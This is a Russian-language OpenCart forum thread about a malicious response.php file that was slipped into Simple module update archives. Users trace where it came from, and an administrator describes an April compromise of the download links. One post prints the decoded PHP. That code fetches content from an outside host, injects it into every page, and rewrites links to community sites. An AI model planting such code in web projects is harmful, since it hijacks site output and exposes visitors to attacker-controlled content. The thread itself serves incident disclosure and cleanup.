Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Recommended Posts

Файл response в обновлении модуля симпла содержит эту дрянь, причем я обновился около месяца назад просто сравнил файлы до обновления и после. У меня бэкап за апрель сохранился.

Надіслати
Поділитися на інших сайтах


Файл response в обновлении модуля симпла содержит эту дрянь, причем я обновился около месяца назад просто сравнил файлы до обновления и после. У меня бэкап за апрель сохранился.

Лично я не пользуюсь симплом. То бишь файл и без него изменился.

Но содержание файла то же самое..

Надіслати
Поділитися на інших сайтах


Проверил купленный архив, там есть эта закодированная дрянь, а у вас когда это произошло? Дело в том, что эта дрянь там давно сидела. Может ставили симплу на тестирование?

Надіслати
Поділитися на інших сайтах


Проверил купленный архив, там есть эта закодированная дрянь, а у вас когда это произошло? Дело в том, что эта дрянь там давно сидела. Может ставили симплу на тестирование?

Нет, просто видимо у автора так же был заражённый файл и он его неудачно упаковал с модулем. Я симпл не покупал.
Надіслати
Поділитися на інших сайтах


Вот что содержится в этой закодированной шляпе:

 

function get_page($url){
        $agent = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ru; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9';
        $ch=curl_init();
        curl_setopt ($ch, CURLOPT_URL,$url );
        curl_setopt($ch, CURLOPT_USERAGENT, $agent);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($ch,CURLOPT_VERBOSE,false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        $page=curl_exec($ch);
        $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        switch($httpcode){
                case '200':
                        return $page;
                break;
                case '404';
                        return false;
                break;
        }
}

if ($ftend = get_page("http://myopencart.net/googlecode/api/api.php?server=".$_SERVER['SERVER_NAME']."&page=".$_SERVER['REQUEST_URI'])){
$find = array("</body>", "</html>", "opencart.com", "=^_^=.ru", "myopencart.ru", "opencartforum.com", "opencart.ru", "opencart.by");
$replace = array("", $ftend, "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net");
$ouput = str_replace($find, $replace, $ouput);
ini_set("display_errors","off");
error_reporting(0);
echo $ouput;}
else {
echo $ouput;
}
 
Надіслати
Поділитися на інших сайтах


Esox сказал(а) 29 Май 2013 - 11:55:

Проверил купленный архив, там есть эта закодированная дрянь, а у вас когда это произошло? Дело в том, что эта дрянь там давно сидела. Может ставили симплу на тестирование?

Я быстрее поверю, что Вы перепутали его с модулем, скачанным с упомянутого нуллед ресурса, чем в то, что хак в исходник хоть раз в жизни попадал в архив Deeman-а.
Надіслати
Поділитися на інших сайтах


Esox сказал(а) 29 Май 2013 - 11:55:

Проверил купленный архив, там есть эта закодированная дрянь, а у вас когда это произошло? Дело в том, что эта дрянь там давно сидела. Может ставили симплу на тестирование?

Я быстрее поверю, что Вы перепутали его с модулем, скачанным с упомянутого нуллед ресурса, чем в то, что хак в исходник хоть раз в жизни попадал в архив Deeman-а.

Подтверждаю наличие этого файла в архиве версии simple 3.5.3 (все оригинальные архивы с обновлениями хранятся ) в версиях 3,5,6 , 3,5,7 - уже нет этого файла  . Модуль мною куплен (можете спросить у автора), сторонними варезными модулями не пользовался никогда, все архивы с обновлениями качаются с этого форума.

Ситуация очень неприятная на самом деле. Лично мне этот файл доставил немало хлопот.

Надіслати
Поділитися на інших сайтах


Проверил купленный архив, там есть эта закодированная дрянь, а у вас когда это произошло? Дело в том, что эта дрянь там давно сидела. Может ставили симплу на тестирование?

Нет, просто видимо у автора так же был заражённый файл и он его неудачно упаковал с модулем. Я симпл не покупал.

Видимо да, т.к. по моему мнению автор сознательно не допустил бы такого ...

Надіслати
Поділитися на інших сайтах


rb2 - ваша вера дала трещину?

 

Типичная халатность автора.

 

НЕ понятно только почему данная дрисня дала о себе знать только через длительное время.

Надіслати
Поділитися на інших сайтах


Esox сказал(а) 29 Май 2013 - 21:19:

rb2 - ваша вера дала трещину?

Пошатывается. Трещины нет пока, спрошу ещё у Димы, как так %)

В его темах не нашёл предупреждений об этом инциденте и апдейтах.

В том, что у меня было под рукой - посмотрел, не было нигде в его Simple такого кода ни в доступных мне установленных копиях на сайтах, ни в паре архивов. Но архива с указанной YarBak-ом 3.5.3 у меня как раз нет, чтоб убедиться окончательно.

Мне нереально сложно представить процесс неконтролируемого попадания чужих фекалий в свой репозиторий - чтобы он туда в рабочую ветку попал, и потом ещё его закоммитить. Правда, я не знаю, как у него процессы организованы. Если вручную колупаться и паковать - мало ли. Может тестировалось что-то из клиентских проблем и оттуда залетело.

Esox сказал(а) 29 Май 2013 - 21:19:

Типичная халатность автора.

Типичное бла-бла-бла.

Плюс свойство человеческой психики: замечать и поделиться легче обидой и жалобами, а не позитивом.

Esox сказал(а) 29 Май 2013 - 21:19:

НЕ понятно только почему данная дрисня дала о себе знать только через длительное время.

Ну упал сервер кулхацкера - вы и заметили.

Причём все сразу.

Надіслати
Поділитися на інших сайтах


В его темах не нашёл предупреждений об этом инциденте и апдейтах.

Я тоже не нашел и это удивило)

 

 

В том, что у меня было под рукой - посмотрел, не было нигде в его Simple такого кода ни в доступных мне установленных копиях на сайтах, ни в паре архивов. Но архива с указанной YarBak-ом 3.5.3 у меня как раз нет, чтоб убедиться окончательно.

Архив версии simple 3.5.3 есть, но только с разрешения автора могу поделиться для ознакомления...

Надіслати
Поділитися на інших сайтах


Архив версии simple 3.5.3 есть, но только с разрешения автора могу поделиться для ознакомления...

Да нет, не надо, я и на слово поверю. Мне больше интересно, КАК это произошло.

На опенкарт.ком доступна только последняя версия, там история не хранится.

Надіслати
Поділитися на інших сайтах


Да нет, не надо, я и на слово поверю. Мне больше интересно, КАК это произошло.

А что сам автор говорит по этому поводу? Или Вы не задавали ему такой вопрос?

 

На опенкарт.ком доступна только последняя версия, там история не хранится.

Сейчас глянул, на этом форуме тоже только последняя версия... предыдущие версии для скачивания недоступны

Надіслати
Поділитися на інших сайтах


Уважаемые, если кто не заметил, повторю - я симплом не пользуюсь, а файл "имею" так же. Смысл обсуждать автора данного модуля? Не сам же он запихнул каждому пострадавшему в индивидуальном порядке. Имеет место быть факт, что не только в этом модуле находится этот файл. Хотя я лично до сих пор не нашёл источника. Ни в 1 из скаченных мною модулей, данный файл не присутствует, практически все модули стараюсь для начала протестировать с vqmod, учитывая собственные поправки в кодах, и в случае необходимости, сам переношу часть кода вручную, и уверен, что тот самый файл никогда не правил. Скажу более, данный файл у меня присутствует ещё на тестовой версии ИМ, заархивированной почти 2 месяца назад, на тот момент там практически голый опенкарт 1.5.4.1

  • +1 2
Надіслати
Поділитися на інших сайтах


Смысл обсуждать автора данного модуля? Не сам же он запихнул каждому пострадавшему в индивидуальном порядке.

 Файл "запихнулся" вместе с обновлением модуля и это факт!  Другой вопрос - каким действительно образом он попал в этот архив к автору ... пока не понятно.

 

 

Имеет место быть факт, что не только в этом модуле находится этот файл. Хотя я лично до сих пор не нашёл источника. Ни в 1 из скаченных мною модулей, данный файл не присутствует

А я вот нашел, в архиве вышеупомянутого модуля файл присутствует!!!!   Это и есть прецедент по поводу которого мы здесь и дискуссируем.

 

И если Вы действительно не имели дело с этим модулем (как официально платной версией , так и позаимствованной из вне) тогда это действительно тревожный сигнал.

Поищите повнимательнее, может обнаружите еще модули, которые могли людям, в т.ч. и Вам внедрить этот файл

Надіслати
Поділитися на інших сайтах


Я говорю о том, что автор модуля сам походу является таким же пострадавшим. Но к сожалению, и распространителем, как Вы утверждаете.

Перерыл все скаченные зипы (только с данного ресурса. никакими максисторами не пользуюсь. халявными или со складчины тем более), но ничего не нашёл. Более того, повторяю, в практически голой версии тестового магазина он присутствует. Надо бы запустить да глянуть, что на тот момент уже успел установить.

Надіслати
Поділитися на інших сайтах


Так, только сейчас мне скинули эту тему. Я автор Simple - сразу заявляю, я такую фигню в модуль не подсовывал и даже в мыслях не было, смысл мне заниматься такой ересью?

Обнаружил сам 15го апреля, когда мне отписался genkabukin, сначала не понял, про что он, но когда скачал свой же модуль с ЭТОГО сайта, то понял, про что он.

Скрины могу приложить, если кто хочет.

Надіслати
Поділитися на інших сайтах

Ребята c 2 по 5 апреля были атакованы сайты https://opencartforum.com и сайт https://myopencart.com/ и заменены ссылки для скачивания именно в файл /system/library/response.php запхнуто в дистрибутив такой же код. В некоторые модуля были помещены эти файлы все что мы смогли найти мы устранили, если Вы встретили другие модуля которые содержат данный код или у вас в архивах лежат модуля с даным файлом, просьба сообщать мне. Вы все помните что после этого периода форум проходил долгое обновление и ужесточились правила модерирования дополнений, мы  следим за модулями в том числе и на проверку именно такого файла. Модуль Simple от  deeman  15 апреля был обновлен и этот файл был устранен из архива, просьба всех проверить свои сайты на наличие этого файла, так как сейчас этот файл активно бегает по всему интернету и вы могли захватить его вместе с бесплатными и платными модулями на других и варезных сайтах

  • +1 1
Надіслати
Поділитися на інших сайтах


Так, только сейчас мне скинули эту тему. Я автор Simple - сразу заявляю, я такую фигню в модуль не подсовывал и даже в мыслях не было, смысл мне заниматься такой ересью?

Обнаружил сам 15го апреля, когда мне отписался genkabukin, сначала не понял, про что он, но когда скачал свой же модуль с ЭТОГО сайта, то понял, про что он.

Скрины могу приложить, если кто хочет.

Вот все и прояснилось ... подтвердились мои слова, что автор модуля адекватный человек и сознательно заниматься подобным не стал бы.

Надіслати
Поділитися на інших сайтах


Ребята c 2 по 5 апреля были атакованы сайты https://opencartforum.com и сайт https://myopencart.com/ и заменены ссылки для скачивания именно в файл /system/library/response.php запхнуто в дистрибутив такой же код. В некоторые модуля были помещены эти файлы все что мы смогли найти мы устранили, если Вы встретили другие модуля которые содержат данный код или у вас в архивах лежат модуля с даным файлом, просьба сообщать мне. Вы все помните что после этого периода форум проходил долгое обновление и ужесточились правила модерирования дополнений, мы  следим за модулями в том числе и на проверку именно такого файла. Модуль Simple от  deeman  15 апреля был обновлен и этот файл был устранен из архива, просьба всех проверить свои сайты на наличие этого файла, так как сейчас этот файл активно бегает по всему интернету и вы могли захватить его вместе с бесплатными и платными модулями на других и варезных сайтах

Спасибо за разъяснение. У меня было предположение, что ерунда с подменой файлов могла произойти во время продолжительного обновления, теперь стало ясно что и обновление не просто так произошло.

Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.